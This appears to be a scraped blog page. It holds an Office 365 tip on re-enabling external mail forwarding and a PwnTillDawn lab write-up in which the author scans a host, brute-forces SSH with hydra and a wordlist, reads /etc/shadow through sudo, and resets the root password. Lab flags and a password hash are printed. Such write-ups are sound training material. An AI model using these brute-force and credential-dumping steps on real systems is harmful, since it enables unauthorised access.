Protected: ptd-snare-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-cereal-nl

This content is password protected. To view it please enter your password below:

Posted on
Fix Office 365 forwarding error Your message wasn’t delivered because the recipient’s email provider rejected it.

 

I used to have an auto forward set up on my mail account in Office365. However, since a few weeks I encountered the following errors:

Your message wasn’t delivered because the recipient’s email provider rejected it.

and

Remote Server returned ‘550 5.7.520 Access denied, Your organization does not allow external forwarding. Please contact your administrator for further assistance. AS(7555)’

The result of these error messages was that my emails were no longer automatically forwarded to another mailbox.

 

What causes this error Remote Server returned ‘550 5.7.520 Access denied’?

Before September 2020, Office 365 allowed emails to be automatically forwarded to external email addresses. This is called “External forwarding”. However, since September 2020, a setting has been changed, whereby External Forwarding is disabled by default at the organization level. This means that all mail that was previously neatly forwarded to an external email address is now suddenly blocked. The affected mailbox, the mailbox with the forwarding rule set up, receives the error “Your message wasn’t delivered because the recipient’s email provider rejected it.

How to fix Remote Server returned ‘550 5.7.520 Access denied

An Office 365 administrator can adjust the default setting in the Office 365 environment, making it possible to forward mail externally again. If you are a user of Office 365, please ask your IT Admin to adjust the setting and send him or her the URL of this web page.
If you are an administrator, follow these steps to re-enable External Forwarding:

  1. Go to the Office365 Security and Compliance Dashboard
  2. Expand Threat Management and click Policy
  3. Click Anti Spam
  4. In the Anti-Spam settings, locate Outbound spam filter policy (Always ON) and click Edit policy
  5. In the Outbound spam filter policy, expand Automatic Forwarding. The default is set to Automatic – System-controlled.
  6. Select On – Forwarding is enabled and click Save. Forwarding to external mail addresses is now allowed. Note Microsoft says it may take up to 24 hours before the change takes effect. Although it took 5 minutes in my case 🙂


.

A setting to rethink – Automatic Forwarding to external email addresses

You may wonder whether it is a good idea to change the default setting for automatic forwarding to external addresses.
One reason for not allowing it is data loss prevention. Recently I was with a customer whose password had been leaked. Hackers have gained access to his mailbox. Instead of directly using his mailbox, they set – unnoticed – a rule that automatically forwarded all mail to an external email address. A good example of corporate espionage.

Protected: htb-tenet-nl

This content is password protected. To view it please enter your password below:

Posted on

ptd-stuntmanmike-private

https://online.pwntilldawn.com/Achievements/Details/1/1438

.

As always we start with a nmap scan

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -A 10.150.150.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:59 GMT
Nmap scan report for 10.150.150.166
Host is up (0.032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
| 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
| 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after: 2022-10-24T09:15:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #ssh root@10.150.150.166
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
root@10.150.150.166's password:
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166 login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-26 11:29:51
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
mike@stuntmanmike:~$ cat FLAG36
8cff2cce1a88a54db986d968a4b7a66fb3588c20

mike@stuntmanmike:~$ sudo -l
Matching Defaults entries for mike on stuntmanmike:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
(ALL : ALL) ALL
mike@stuntmanmike:~$ groups
mike adm cdrom sudo dip plugdev lxd
mike@stuntmanmike:~$ sudo cat /etc/shadow
root:*:17941:0:99999:7:::
--snip--
sshd:*:18043:0:99999:7:::
mike:$6$4ytsdVARn//SY.7x$ZNJHsx3CHR3zCU91Q.3RjHDK4hZ72GIT5.n/ygetAZ3Armybjj.l6QMb5PAvidEHvgGRipOcycOTnU8ePzwEl1:18043:0:99999:7:::
splunk:!:18194:0:99999:7:::

mike@stuntmanmike:/$ sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
mike@stuntmanmike:/$ su root
Password:
root@stuntmanmike:/# cd /root
root@stuntmanmike:~# cat FLAG37
28d10397e475a50fc0d6c73f7c23355ebdf15a3f

.

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/  and https://online.pwntilldawn.com/  in your write-up.